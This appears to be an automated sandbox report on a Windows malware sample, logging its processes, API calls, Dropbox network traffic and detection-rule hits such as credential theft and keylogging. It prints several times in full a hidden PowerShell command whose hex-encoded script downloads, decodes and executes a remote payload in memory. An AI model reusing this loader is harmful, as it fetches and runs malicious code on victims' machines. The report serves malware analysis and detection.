428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
domain dl.dropboxusercontent.com
file C:\Users\test22\AppData\Local\Temp\l9fffhn5.dll
file C:\Users\test22\AppData\Local\Temp\zber1qmo.dll
file C:\Users\test22\AppData\Local\Temp\zucfn5_i.dll
file C:\Users\test22\AppData\Local\Temp\0hodn2ty.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2716
thread_handle: 0x00000088
process_identifier: 2712
current_directory:
filepath: c:\Windows\SysWOW64\cmd.exe
track: 1
command_line: c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
filepath_r: c:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2868
thread_handle: 0x00000094
process_identifier: 2864
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
filepath_r: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data sent |xe%©§B£wäTÅ_y´µ›EZTžiÕ¨:îàò/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%©R†¥@÷*·-‹3S %Jo@o Ü(k–s ¿Æ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%´¼¨Â©h-# %'XÍ uW‰·ÿR‰øÌ$œ÷5‘/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%´Ÿ»¹èI$*—ª{‚ZçNÈþ}µË‚6€ã&ÿ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%¿]’ö¤‡†›;-Ì´úõß å‹’>~)ûA~‡/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%¿š÷zL*–¨6Á¥|²M‡ðÜã¨âa,›¶/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%ÊVzLŽðß;=cüy¶µðP*mwô‰Cï¬/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%ʅ4›æȆ±«/¼wª¾9zùö w GÅ./5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%Õ^çê»>{pïGP·Þ‰6¤I—þ<æË(<4¯,³/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%՜['9 M²…;ÓksÓ-p¢\òV›ïl¦M¼+/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%àg™G€²t€—ÏoL#c.ódžÆ†{¸/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%àåG}ì’у¦Ÿ¦Ýç Á–ßâ҅¤0ÎO„7J/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%ë«Eºe|æOãZ˜ň^"Óhî„OóÓÔÕ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%뤁÷H”Ž2±aBwÞi׈é«-j(­mý(ð[/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%ö!`O¢Š%8ÿ垊iš/E_KŸí¬ñ´¬Q/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%öÛ"XN6æ-Ýó”.'áÜŽÏ£¢ÄGšWä/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe% Û#f57™ô MšxÚ Š”NˆõaeW¡Å³#F/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%¥Ànñºï)ð}äjæýŠ6úd–Æ_èH/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe% ™2tl[´,–·¯«®c(m°ÞE¢GÛ„w9]/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe% ·'¿«šVZÂeÖ_»\\®Áf*B¼|/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%«þS—C§JWÓ|“_9 Ö¬(rrë"د¡Ñ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe%=KÞǓV-=~•vVµÈKKÏäŒnOóŠ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\0hodn2ty.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zber1qmo.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
cmdline C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
Time & API Arguments Status Return Repeated

send

 buffer: |xe%©§B£wäTÅ_y´µ›EZTžiÕ¨:îàò/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%©R†¥@÷*·-‹3S %Jo@o Ü(k–s ¿Æ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%´¼¨Â©h-# %'XÍ uW‰·ÿR‰øÌ$œ÷5‘/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%´Ÿ»¹èI$*—ª{‚ZçNÈþ}µË‚6€ã&ÿ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%¿]’ö¤‡†›;-Ì´úõß å‹’>~)ûA~‡/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%¿š÷zL*–¨6Á¥|²M‡ðÜã¨âa,›¶/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%ÊVzLŽðß;=cüy¶µðP*mwô‰Cï¬/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%ʅ4›æȆ±«/¼wª¾9zùö w GÅ./5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%Õ^çê»>{pïGP·Þ‰6¤I—þ<æË(<4¯,³/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%՜['9 M²…;ÓksÓ-p¢\òV›ïl¦M¼+/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%àg™G€²t€—ÏoL#c.ódžÆ†{¸/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%àåG}ì’у¦Ÿ¦Ýç Á–ßâ҅¤0ÎO„7J/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%ë«Eºe|æOãZ˜ň^"Óhî„OóÓÔÕ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%뤁÷H”Ž2±aBwÞi׈é«-j(­mý(ð[/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%ö!`O¢Š%8ÿ垊iš/E_KŸí¬ñ´¬Q/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%öÛ"XN6æ-Ýó”.'áÜŽÏ£¢ÄGšWä/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe% Û#f57™ô MšxÚ Š”NˆõaeW¡Å³#F/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%¥Ànñºï)ð}äjæýŠ6úd–Æ_èH/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe% ™2tl[´,–·¯«®c(m°ÞE¢GÛ„w9]/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe% ·'¿«šVZÂeÖ_»\\®Áf*B¼|/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%«þS—C§JWÓ|“_9 Ö¬(rrë"د¡Ñ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0

send

 buffer: |xe%=KÞǓV-=~•vVµÈKKÏäŒnOóŠ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1252
sent: 129
1 129 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zber1qmo.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\0hodn2ty.cmdline"
Process injection Process 2624 resumed a thread in remote process 2712
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2712
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe